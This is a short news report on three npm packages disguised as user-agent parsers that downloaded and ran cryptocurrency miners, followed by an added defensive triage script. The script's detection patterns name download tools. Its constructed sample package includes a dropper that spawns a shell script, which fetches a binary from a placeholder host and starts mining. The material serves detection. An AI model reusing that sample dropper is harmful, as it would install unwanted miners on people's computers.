Cryptocurrency miner detected in three npm packages

Sonatype specialists found another piece of malware in the JavaScript package manager npm (Node Package Manager). This time, three libraries at once contained a hidden cryptocurrency miner.

All three malicious packages (klow, klown and okhsa) were disguised as user-agent string parsers. However, once downloaded, they determined which operating system the victim was running and launched a BAT or shell script (depending on the victim's platform).

“Then these scripts loaded an EXE or Linux ELF hosted on an external server and executed a binary with arguments indicating the mining pool, cryptocurrency wallet and the number of CPU threads used,” Sonatype experts write.

The final payloads (miners) could run on both Windows and Linux.
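
As an added illustration (not Sonatype's tooling and not code taken from the packages), the following static triage heuristic checks an unpacked npm package for the shape described above: a library that branches on the operating system and spawns a BAT or shell script, plus a bundled script that downloads a file and names a mining pool. The regular expressions, the `stratum+` URL scheme, the file names and the sample package contents are assumptions constructed for the example.

```javascript
// Added example: heuristic triage of one unpacked npm package.
// Patterns and samples are constructed assumptions, not real indicators.
const JS_SIGNALS = {
  platformCheck: /\b(?:process\.platform|os\.(?:platform|type)\s*\()/,
  childProcess: /require\(\s*['"](?:node:)?child_process['"]\s*\)/,
  launchesScript: /['"`][^'"`\n]*\.(?:bat|cmd|sh)['"`]/i,
};
const SCRIPT_SIGNALS = {
  downloads: /\b(?:curl|wget|certutil|bitsadmin|Invoke-WebRequest)\b/i,
  poolUrl: /stratum\+(?:tcp|ssl):\/\//i, // assumed pool URL scheme
};

// files: { "relative/path": "contents" } for one unpacked package.
function triagePackage(files) {
  const hits = [];
  for (const [path, text] of Object.entries(files)) {
    const isScript = /\.(?:bat|cmd|sh)$/i.test(path);
    if (!isScript && !/\.[cm]?js$/i.test(path)) continue;
    const signals = isScript ? SCRIPT_SIGNALS : JS_SIGNALS;
    for (const [signal, pattern] of Object.entries(signals)) {
      if (pattern.test(text)) hits.push({ path, signal });
    }
  }
  const seen = new Set(hits.map((h) => h.signal));
  // A user-agent parser has no reason to branch on the OS and spawn a script.
  const dropperShape = ['platformCheck', 'childProcess', 'launchesScript']
    .every((s) => seen.has(s));
  // A bundled script that fetches a file and names a mining pool.
  const minerShape = seen.has('downloads') && seen.has('poolUrl');
  let verdict = 'ok';
  if (dropperShape || minerShape) verdict = 'review';
  if (dropperShape && minerShape) verdict = 'block';
  return { verdict, hits };
}

// Constructed samples (placeholder host, wallet and flag names).
const SUSPICIOUS = {
  'index.js': [
    "const { spawn } = require('child_process');",
    "const script = process.platform === 'win32' ? 'run.bat' : 'run.sh';",
    "spawn(script, { shell: true });",
  ].join('\n'),
  'run.sh': [
    'curl -s -o ./worker https://files.example.invalid/worker',
    './worker --pool stratum+tcp://pool.example.invalid:3333 --wallet WALLET_PLACEHOLDER --threads 4',
  ].join('\n'),
};
const BENIGN = { 'index.js': 'module.exports = (ua) => ({ mobile: /Mobi/.test(ua) });' };

console.log(triagePackage(SUSPICIOUS).verdict, triagePackage(BENIGN).verdict);
```

A `review` verdict means only one half of the pattern was seen; build tooling can legitimately use `child_process`, so the combination of signals is what matters for a package that claims to be a string parser.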

Fortunately, all three packages were active for only one day, October 15, 2021, and none of them received more than 150 downloads. Interestingly, all three malicious libraries were published from the same account, that is, they were created by one person.

